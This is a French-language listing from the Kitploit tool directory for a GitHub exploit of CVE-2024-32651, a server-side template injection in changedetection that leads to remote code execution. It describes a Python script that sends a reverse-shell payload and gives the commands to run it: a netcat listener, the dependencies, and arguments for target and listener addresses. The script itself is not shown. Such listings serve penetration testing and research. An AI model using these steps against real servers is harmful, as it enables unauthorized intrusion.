Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-32651-changedetection-RCE — Server-Side Template Injection Exploit | Kitploit
Outils/GitHubGitHub/s0ck3t-s3c/cve-2024-32651-changedetection-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubs0ck3t-s3c/cve-2024-32651-changedetection-rce

CVE-2024-32651-changedetection-RCE

Server-Side Template Injection Exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
43il y a 1 anPas encore vérifié

CVE-2024-32651 changedetection < 0.45.20 - Exécution de code à distance (RCE)

Exploit d'injection de modèles côté serveur !!

1. Titre

Exécution de code à distance via une injection de modèles côté serveur (SSTI) dans une application web vulnérable

2. Description

Cet exploit cible une application web vulnérable à l'injection de modèles côté serveur (SSTI). En exploitant cette vulnérabilité, un attaquant peut exécuter des commandes arbitraires sur le serveur. Le script Python fourni automatise le processus d'exploitation en soumettant une charge utile qui déclenche un reverse shell.

3. Informations sur la vulnérabilité

  1. ID CVE : CVE-2024-32651
  2. Systèmes affectés : Applications web qui utilisent l'injection de modèles côté serveur (SSTI) et qui ont une configuration vulnérable.

4. Preuve de concept

Pour reproduire la vulnérabilité, exécutez le script Python fourni contre l'application web vulnérable. Assurez-vous d'avoir un écouteur (par exemple, nc -lvp 9999) en cours d'exécution pour capturer la connexion du reverse shell.

5. Utilisation

  1. Enregistrez le script dans un fichier nommé CVE-2024-32651.py.

  2. Installez les bibliothèques Python requises si ce n'est pas déjà fait :

    root@kitploit:~
    pip install requests beautifulsoup4
    
    
  3. Pour utiliser le script, fournissez les arguments suivants en ligne de commande :

  • --url: URL de base de l'application web vulnérable (par exemple, http://10.10.10.10:5000).
  • --port: Port de l'écouteur (par exemple, 9999).
  • --ip: Adresse IP de l'écouteur (par exemple, 10.10.50.22).
  • --notification: (Optionnel) URL de notification si vous souhaitez utiliser une URL de notification spécifique.
  1. Exécutez le script en utilisant Python 3 avec les arguments requis. La syntaxe est :
    root@kitploit:~
    python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
    

6. Crédits

Cette version corrigée de l'exploit est basée sur un exploit original publié par Zach Crosman (zcrosman) avec l'EDB-ID : 52027. Vous pouvez consulter l'exploit original ici. Je remercie Zach Crosman pour sa contribution à la communauté de la sécurité.

Télécharger l’outil